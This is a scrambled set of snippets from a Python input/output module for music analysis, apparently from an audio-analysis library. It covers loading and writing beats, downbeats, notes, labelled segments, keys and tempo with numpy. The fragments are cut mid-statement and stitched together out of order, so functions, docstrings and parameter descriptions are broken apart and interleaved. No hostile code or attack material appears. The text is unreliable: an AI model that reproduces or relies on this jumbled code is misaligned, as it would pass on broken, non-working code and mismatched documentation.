\"\"\" if beats.ndim == 2: beats = beats[beats[:, 1]", "from file, one segment per line. Each segment is of form <start> <end>", "= np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is not None:", "most dominant tempo. strength : float Their relative strength. \"\"\" # make the", "per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or", "---------- notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number'", "['duration' ['velocity']]. filename : str or file handle File to write the notes", "from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured", "sequence of strs, optional A single format (e.g. '%.3f'), a sequence of formats,", "else: f = filename fid = None # yield an open file handle", "to be written to file. filename : str or file handle File to", "bool, deprecated Report the lower tempo first (as required by MIREX). Returns -------", "tempi and their relative strength if max_len is not None: import warnings warnings.warn('`max_len`", "# write events for e in events: try: string = fmt % tuple(e.tolist())", "tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum)", "written at the beginning of the file as comment. Returns ------- numpy structured", "1. max_len : int, deprecated Return at most `max_len` tempi. Returns ------- tempi", "handle File to write the notes to. fmt : str or sequence of", "given file. Tempo information must have the following format: 'main tempo' ['secondary tempo'", "Returns ------- numpy array Events. Notes ----- Comments (lines starting with '#') and", "'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum)", "tempi = np.array(tempi, ndmin=2) # default values t1 = t2 = strength =", "downbeats from the given file. 
Parameters ---------- filename : str or file handle", "strengths (second column) is returned. \"\"\" # try to load the data from", "to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'],", "\"\"\" Write the most dominant tempi and the relative strength to a file.", "of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f", "1st column is the event's time, the rest is ignored return events[:, 0]", "see SEGMENT_DTYPE). filename : str or file handle Output filename or handle. fmt", "one per row (column definition see SEGMENT_DTYPE). filename : str or file handle", "file as comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled", "------- segments : numpy structured array Structured array with columns 'start', 'end', and", ": bool, deprecated Sort the tempi by their strength. norm_strengths : bool, deprecated", "rows with a \"1\" in the 2nd column are downbeats return values[values[:, 1]", "% e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings", "the beats from the given file, one beat per line of format 'beat_time'", "np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return segments", "columns are ignored, i.e. only the first column is returned. \"\"\" # read", "number per line. Parameters ---------- filename : str or file handle File to", "from the given file, one note per line of format 'onset_time' 'note_number' ['duration'", "the beginning, end, and label of segments. \"\"\" start, end, label = [],", "if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with", "sequence of strs, optional A single format (e.g. 
'%.3f'), a sequence of formats", "None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None:", "is of form <start> <end> <label>, where <start> and <end> are floating point", ": bool, deprecated Report the lower tempo first (as required by MIREX). Returns", "'\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\"", "File to write the events to. fmt : str or sequence of strs,", "# but we need to apply this '(-strengths)' trick because we want #", "hack-ish, find a better solution tempi = values[values > split_value] strengths = values[values", ": numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength is", "Context manager which yields an open file or handle with the given mode", "as comment. \"\"\" if fmt is None and beats.ndim == 2: fmt =", "warnings.warn('`sort` is deprecated as of version 0.16 and will be ' 'removed in", "filename : str or file handle Output file. delimiter : str, optional String", "'num_tempi' is returned. If strengths are given, a 2D array with tempi (first", "order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at", "(num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or", "file handle Output file. delimiter : str, optional String or character separating columns.", "the ' 'tempi manually') if t1 > t2: t1, t2, strength = t2,", "' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have same length", "label = [], [], [] with open_file(filename) as f: for line in f:", "line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments =", "columns 'start', 'end', and 'label', containing the beginning, end, and label of segments.", "notes to a file. 
Parameters ---------- notes : numpy array, shape (num_notes, 2)", "is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and", "% tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt %", "numpy structured arrays that contain labelled segments # 'label' needs to be castable", "fid = _io.open(filename, mode) else: f = filename fid = None # yield", "and strengths # TODO: this is kind of hack-ish, find a better solution", "---------- filename: str or file handle File to load the notes from. Returns", "strength = np.nan # only one tempo was detected if len(tempi) == 1:", "return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a file.", "0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths", "or file handle File to load the events from. Returns ------- numpy array", "sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g.", "deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy array, shape", "as np from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils", "of form <start> <end> <label>, where <start> and <end> are floating point numbers,", "sum 1. max_len : int, deprecated Return at most `max_len` tempi. Returns -------", "formats, or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is", "or a multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter`", "numpy structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename", "will be ' 'removed in 0.18. Please sort the returned array ' 'separately.')", "Parameters ---------- segments : numpy structured array Labelled segments, one per row (column", "given mode and closes it if needed afterwards. Parameters ---------- filename : str", "%d'), in which case `delimiter` is ignored. 
delimiter : str, optional String or", "events from a text file, one floating point number per line. Parameters ----------", "fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim ==", "returned. \"\"\" # read in the events, one per line events = np.loadtxt(filename,", "to. fmt : str or sequence of strs, optional A sequence of formats", "String or character separating columns. header : str, optional String that will be", "sequence of formats, or a multi-format string (e.g. '%.3f %.3f'), in which case", "array Beats or downbeats to be written to file. filename : str or", "\"\"\" Write the events to a file, one event per line. Parameters ----------", "str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in", "closes it if needed afterwards. Parameters ---------- filename : str or file handle", "---------- filename : str or file handle File to load the tempo from.", "load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from", "handle File to load the tempo from. split_value : float, optional Value to", "1]) # for MIREX, the lower tempo must be given first if mirex", "str or file handle File to load the tempo from. split_value : float,", "of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or", "# normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is", "downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column is the", "column) and their strengths (second column). filename : str or file handle Output", "[], [], [] with open_file(filename) as f: for line in f: s, e,", "== 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt,", "\"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load", "Yields ------ Open file (handle). 
\"\"\" # check if we need to open", "'(-strengths)' trick because we want # tempi with uniformly distributed strengths to keep", "+ '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False):", "If strengths are given, a 2D array with tempi (first column) and their", "== 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths", "per line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time,", "values[values > split_value] strengths = values[values <= split_value] # make the strengths behave", "import io as _io import contextlib import numpy as np from .audio import", "normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated", "manager which yields an open file or handle with the given mode and", "AssertionError('strengths must be positive') # no strength is given, assume an evenly distributed", "strengths (second column). filename : str or file handle Output file. delimiter :", "single format (e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g.", "max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16", "column) is returned. \"\"\" # try to load the data from file values", "character separating columns. header : str, optional String that will be written at", "e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def", "Parameters ---------- events : numpy array Events to be written to file. filename", "'%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate", "array Beats to be written to file. 
filename : str or file handle", "are represented as numpy structured array with three named columns: 'start' contains the", "file or handle with the given mode and closes it if needed afterwards.", "open_file(filename) as f: for line in f: s, e, l = line.split() start.append(float(s))", "strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi", "strength # format as a numpy array and write to output out =", ": numpy array Events to be written to file. filename : str or", "handle yield f # close the file if needed if fid: fid.close() @suppress_warnings", "filename : str or file handle File to load the downbeats from. Returns", "strength is parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths", "an open file or handle with the given mode and closes it if", "\"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt,", "Write the beats to a file. Parameters ---------- beats : numpy array Beats", "in version 0.17. Please sort the ' 'tempi manually') if t1 > t2:", "array Events to be written to file. filename : str or file handle", "is a string. Parameters ---------- filename : str or file handle File to", "str, optional String that will be written at the beginning of the file", "= ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt,", "a file. Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row", "is the event's time, the rest is ignored return events[:, 0] def write_events(events,", "(e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter : str, optional", "`delimiter` is ignored. delimiter : str, optional String or character separating columns. header", "or a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored.", "filename or handle. fmt : str or sequence of strs, optional A sequence", "shape (num_tempi[, 2]) Array with tempi. 
If no strength is parsed, a 1-dimensional", "File to load the notes from. Returns ------- numpy array Notes. \"\"\" return", "!= len(strengths): raise AssertionError('tempi and strengths must have same length') # order the", "load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file.", "given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header)", "Load labelled segments from file, one segment per line. Each segment is of", "str or file handle File to load the beats from. downbeats : bool,", "interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort :", "segments to a file. Parameters ---------- segments : numpy structured array Labelled segments,", "as of version 0.16 and will be ' 'removed in 0.18. Please sort", ": str or file handle File to read key information from. Returns -------", "definition see SEGMENT_DTYPE). filename : str or file handle Output filename or handle.", "write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy", "opened. Yields ------ Open file (handle). \"\"\" # check if we need to", "not None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 '", "be written at the beginning of the file as comment. Returns ------- key", "f = fid = _io.open(filename, mode) else: f = filename fid = None", "filename according to their filename into tempi and strengths # TODO: this is", "handle with the given mode and closes it if needed afterwards. Parameters ----------", "return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "to a file. 
Parameters ---------- beats : numpy array Beats to be written", "be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] #", "Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time'", "values t1 = t2 = strength = np.nan # only one tempo was", "array ' 'separately.') # Note: use 'mergesort', because we want a stable sorting", "header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment per line.", "absolute_import, division, print_function import io as _io import contextlib import numpy as np", "of version 0.16 and will be ' 'removed in 0.18. Please truncate the", "filename: str or file handle File to load the notes from. Returns -------", "end position, and 'label' the segment label. \"\"\" if fmt is None: fmt", "'%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`') #", "(first column) and their strengths (second column). filename : str or file handle", "tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values` <=", "mode and closes it if needed afterwards. Parameters ---------- filename : str or", "and closes it if needed afterwards. Parameters ---------- filename : str or file", "np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to transparently apply", "sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'),", "tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: #", "array and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename,", "the downbeats from the given file. Parameters ---------- filename : str or file", "consider only the two strongest tempi and strengths elif len(tempi) > 1: t1,", "with a beat number of 1). \"\"\" if beats.ndim == 2: beats =", "to distinguish between tempi and strengths. 
`values` > `split_value` are interpreted as tempi", "the labelled segments from. Returns ------- segments : numpy structured array Structured array", "split_value] strengths = values[values <= split_value] # make the strengths behave properly strength_sum", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ----------", "file. Parameters ---------- tempi : numpy array Array with the detected tempi (first", "use 'mergesort', because we want a stable sorting algorithm # which keeps the", "Write the events to a file, one event per line. Parameters ---------- events", "'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to", "f # close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename):", "is kind of hack-ish, find a better solution tempi = values[values > split_value]", "default format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if", "distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize", "downbeats (i.e. only the times of those beats with a beat number of", "# encoding: utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function", "the end position, and 'label' the segment label. \"\"\" if fmt is None:", "if needed afterwards. Parameters ---------- filename : str or file handle File (handle)", "fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file.", "# tempi and strengths must have same length if len(tempi) != len(strengths): raise", "need to open the file if isinstance(filename, string_types): f = fid = _io.open(filename,", "strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths", "Events. 
Notes ----- Comments (lines starting with '#') and additional columns are ignored,", "if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt", "if len(tempi) == 1: t1 = tempi[0][0] strength = 1. # consider only", "tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the", "the event's time, the rest is ignored return events[:, 0] def write_events(events, filename,", "Write labelled segments to a file. Parameters ---------- segments : numpy structured array", "strengths are given, a 2D array with tempi (first column) and their relative", "want # tempi with uniformly distributed strengths to keep their order sort_idx =", "f: # write header if header is not None: f.write(bytes(('# ' + header", "'%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header)", "fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load", "def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given", "return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most", "== 1][:, 0] else: # 1st column is the beat time, the rest", "\"\"\" Load the key from the given file. Parameters ---------- filename : str", "format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File to", "of those beats with a beat number of 1). \"\"\" if beats.ndim ==", "beginning of the file as comment. \"\"\" events = np.array(events) # reformat fmt", "delimiter='\\t', header=None): \"\"\" Write the events to a file, one event per line.", "a \"1\" in the 2nd column are downbeats return values[values[:, 1] == 1][:,", "Returns ------- segments : numpy structured array Structured array with columns 'start', 'end',", "optional A sequence of formats (e.g. 
['%.3f', '%.3f', '%s']), or a multi-format string", "..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays", "fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the", "out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'], delimiter=delimiter, header=header)", "= fid = _io.open(filename, mode) else: f = filename fid = None #", "to load the notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename,", "is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None):", "(e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in", "to file. filename : str or file handle File to write the beats", "def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file.", "suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays that contain", "Write the downbeats to a file. Parameters ---------- beats : numpy array Beats", "except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets =", "in which case `delimiter` is ignored. delimiter : str, optional String or character", "None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and", "Load the beats from the given file, one beat per line of format", "'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle File to load", "header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats : numpy", "only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values =", "float, optional Value to distinguish between tempi and strengths. `values` > `split_value` are", "# make the given tempi a 2d array tempi = np.array(tempi, ndmin=2) #", "removed in 0.18. 
Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi", "%s'), in which case `delimiter` is ignored. delimiter : str, optional String or", "TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events", "= ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords", "# 1st column is the beat time, the rest is ignored return values[:,", "with three named columns: 'start' contains the start position (e.g. seconds), 'end' the", "be removed in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) #", "dominant tempo. strength : float Their relative strength. \"\"\" # make the given", "comment. Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header)", "def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file.", "from. Returns ------- segments : numpy structured array Structured array with columns 'start',", "with open_file(filename, 'wb') as f: # write header if header is not None:", "column). filename : str or file handle Output file. delimiter : str, optional", "of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a", "truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write", "# default values t1 = t2 = strength = np.nan # only one", "first (as required by MIREX). Returns ------- tempo_1 : float The most dominant", "and <end> are floating point numbers, and <label> is a string. Parameters ----------", "str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None,", "sort the returned array ' 'separately.') # Note: use 'mergesort', because we want", "len(tempi) == 1: t1 = tempi[0][0] strength = 1. 
# consider only the", "of length 'num_tempi' is returned. If strengths are given, a 2D array with", "fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename):", "segments, one per row (column definition see SEGMENT_DTYPE). filename : str or file", "if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will", "['relative_strength']] Parameters ---------- filename : str or file handle File to load the", "AssertionError('tempi and strengths must have same length') # order the tempi according to", "to write the beats to. fmt : str or sequence of strs, optional", "parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths are given,", "---------- beats : numpy array Beats to be written to file. filename :", "kind of hack-ish, find a better solution tempi = values[values > split_value] strengths", "or file handle File (handle) to open. mode: {'r', 'w'} Specifies the mode", "most 'max_len' tempi and their relative strength if max_len is not None: import", "but we need to apply this '(-strengths)' trick because we want # tempi", "Write key string to a file. Parameters ---------- key : str Key name.", "max_len=None): \"\"\" Load tempo information from the given file. Tempo information must have", "to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the", "write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the", "<end> are floating point numbers, and <label> is a string. Parameters ---------- filename", ": numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']].", "distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths", "strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1. 
max_len :", "= e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush()", "or file handle File to load the downbeats from. Returns ------- numpy array", "<label>, where <start> and <end> are floating point numbers, and <label> is a", "= delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write header", "Labelled segments Notes ----- Labelled segments are represented as numpy structured array with", "given file, one beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename", "def write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters ----------", "needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label',", "from. split_value : float, optional Value to distinguish between tempi and strengths. `values`", "detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1. # consider", "encoding: utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import", "comment. mirex : bool, deprecated Report the lower tempo first (as required by", "the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None):", "Load only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values", "['velocity']]. Parameters ---------- filename: str or file handle File to load the notes", "to write the notes to. fmt : str or sequence of strs, optional", "0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header)", "per line. Parameters ---------- events : numpy array Events to be written to", "0.16 ' 'and will be removed in version 0.17. Please sort the '", "' + header + '\\n').encode(ENCODING))) # write events for e in events: try:", "be written at the beginning of the file as comment. 
mirex : bool,", "---------- filename : str or file handle File to read the labelled segments", "must have same length') # order the tempi according to their strengths if", "and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f',", "' 'removed in 0.18. Please sort the returned array ' 'separately.') # Note:", "segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label", "tempi (first column) and their strengths (second column). filename : str or file", "same length') # order the tempi according to their strengths if sort: import", "segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a", "is deprecated as of version 0.16 ' 'and will be removed in version", "header=None): \"\"\" Write the events to a file, one event per line. Parameters", ".midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' #", "assume an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) /", "strength : float Their relative strength. \"\"\" # make the given tempi a", "those beats with a beat number of 1). \"\"\" if beats.ndim == 2:", "file. Parameters ---------- segments : numpy structured array Labelled segments, one per row", "given, a 2D array with tempi (first column) and their relative strengths (second", "- strength # format as a numpy array and write to output out", "SEGMENT_DTYPE). filename : str or file handle Output filename or handle. fmt :", "beats from the given file, one beat per line of format 'beat_time' ['beat_number'].", "Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must", "with the detected tempi (first column) and their strengths (second column). filename :", "np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with a \"1\"", "strengths. 
`values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are", "comment. Returns ------- numpy array Notes. \"\"\" # set default format if fmt", "fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments", "segments from file, one segment per line. Each segment is of form <start>", "handle File to write the beats to. fmt : str or sequence of", "strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength", "\"\"\" Write the beats to a file. Parameters ---------- beats : numpy array", ": str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None,", "Load tempo information from the given file. Tempo information must have the following", "keys # but we need to apply this '(-strengths)' trick because we want", "string to a file. Parameters ---------- key : str Key name. filename :", "column) and their relative strengths (second column) is returned. \"\"\" # try to", "segments : numpy structured array Labelled segments, one per row (column definition see", "and ' 'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths", "def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file,", "if t1 > t2: t1, t2, strength = t2, t1, 1. - strength", "'w'} Specifies the mode in which the file is opened. Yields ------ Open", "or file handle File to write the events to. fmt : str or", "f: for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l)", "key : str Key name. filename : str or file handle Output file.", "0.16 and will be ' 'removed in 0.18. Please truncate the returned array", "= tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX,", "key string to a file. Parameters ---------- key : str Key name. 
filename", "evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) #", "file is opened. Yields ------ Open file (handle). \"\"\" # check if we", ": float Their relative strength. \"\"\" # make the given tempi a 2d", "warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will be removed", "return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats", "a multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is", "numpy array Events. Notes ----- Comments (lines starting with '#') and additional columns", "beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats,", "number of the beats, they are filtered to contain only the downbeats (i.e.", "%.3f'), in which case `delimiter` is ignored. delimiter : str, optional String or", "line. Parameters ---------- filename : str or file handle File to load the", "len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0):", "the key from the given file. Parameters ---------- filename : str or file", "write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file,", "['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to load the", "end, and label of segments. \"\"\" start, end, label = [], [], []", "def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file.", "if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of version", "mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as of version", "file. filename : str or file handle File to write the beats to.", "\"\"\" # check if we need to open the file if isinstance(filename, string_types):", "as of version 0.16 and ' 'will be removed in 0.18. 
Please normalize", "= strengths[sort_idx] # return at most 'max_len' tempi and their relative strength if", "their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return", "str or file handle File to load the events from. Returns ------- numpy", "Parameters ---------- filename : str or file handle File to read key information", "tempo must be given first if mirex is not None: import warnings warnings.warn('`mirex`", "the data from file values = np.loadtxt(filename, ndmin=1) # split the filename according", "---------- filename : str or file handle File to load the events from.", "a multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored.", "strengths[sort_idx] # return at most 'max_len' tempi and their relative strength if max_len", "open. mode: {'r', 'w'} Specifies the mode in which the file is opened.", "that will be written at the beginning of the file as comment. Returns", "File to load the tempo from. split_value : float, optional Value to distinguish", "optional String that will be written at the beginning of the file as", "@suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file, one note", "Beats to be written to file. filename : str or file handle File", "A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g.", "need to apply this '(-strengths)' trick because we want # tempi with uniformly", "Parameters ---------- filename : str or file handle File to load the beats", "or file handle File to read key information from. Returns ------- str Key.", "1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') #", "segment is of form <start> <end> <label>, where <start> and <end> are floating", "a beat number of 1). 
\"\"\" if beats.ndim == 2: beats = beats[beats[:,", "solution tempi = values[values > split_value] strengths = values[values <= split_value] # make", "version 0.16 and will be ' 'removed in 0.18. Please truncate the returned", "to a file. Parameters ---------- tempi : numpy array Array with the detected", "label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename,", "to apply this '(-strengths)' trick because we want # tempi with uniformly distributed", "'tempi manually') if t1 > t2: t1, t2, strength = t2, t1, 1.", "comment. \"\"\" if fmt is None and beats.ndim == 2: fmt = ['%.3f',", "Notes ----- If `beats` contains both time and number of the beats, they", "file as comment. Returns ------- numpy array Notes. \"\"\" # set default format", "\"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows", "fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt", "# split the filename according to their filename into tempi and strengths #", "the beginning of the file as comment. Returns ------- key : str Key", "file handle File (handle) to open. mode: {'r', 'w'} Specifies the mode in", "<label> is a string. Parameters ---------- filename : str or file handle File", "file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open", "load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for", "ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the", "\"\"\" Load the beats from the given file, one beat per line of", "that will be written at the beginning of the file as comment. Notes", "as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort : bool,", "Output file. delimiter : str, optional String or character separating columns. header :", "the lower tempo first (as required by MIREX). 
